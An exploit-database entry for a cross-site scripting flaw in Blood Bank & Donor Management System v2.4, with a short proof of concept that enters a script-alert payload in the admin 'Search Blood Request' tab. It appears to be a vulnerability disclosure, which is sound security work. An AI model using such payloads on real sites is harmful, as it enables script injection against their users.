Exploit for Blood Bank and Donor Management System 2.4 Cross Site Scripting

Name: Exploit for Blood Bank and Donor Management System 2.4 Cross Site Scripting
Rating: 5 (41 reviews)

2025-04-07 | CVSS 6.6

## https://sploitus.com/exploit?id=PACKETSTORM:190322
# Exploit Title: Blood Bank & Donor Management System v2.4 - Cross
    Site Scripting (XSS)
    # Date: 2025-04-07
    # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
    # Vendor: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
    # Demo Site: http://localhost/BBDMS-Project-PHP-V2.4/bbdms
    # Tested on: Kali Linux
    # CVE: N/A
    
    PoC:
    
    1. login as admin
    2. go to "Search Blood Request" tab and give this xss payload
    
    <script>alert(1337)</script>